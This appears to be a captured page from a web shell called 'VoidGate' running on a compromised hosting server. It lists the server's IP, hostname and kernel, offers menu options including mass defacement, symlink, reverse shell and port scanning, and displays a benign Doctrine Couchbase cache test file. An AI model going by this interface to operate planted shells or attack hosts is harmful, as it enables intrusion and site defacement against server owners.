ヤミRoot VoidGate
User / IP
:
216.73.216.33
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
vendor
/
doctrine
/
cache
/
tests
/
Doctrine
/
Tests
/
Common
/
Cache
/
Viewing: CouchbaseCacheTest.php
<?php namespace Doctrine\Tests\Common\Cache; use Couchbase; use Doctrine\Common\Cache\CouchbaseCache; /** * @requires extension couchbase */ class CouchbaseCacheTest extends CacheTest { private $couchbase; protected function setUp() { try { $this->couchbase = new Couchbase('127.0.0.1', 'Administrator', 'password', 'default'); } catch(Exception $ex) { $this->markTestSkipped('Could not instantiate the Couchbase cache because of: ' . $ex); } } protected function _getCacheDriver() { $driver = new CouchbaseCache(); $driver->setCouchbase($this->couchbase); return $driver; } }
Coded With 💗 by
0x6ick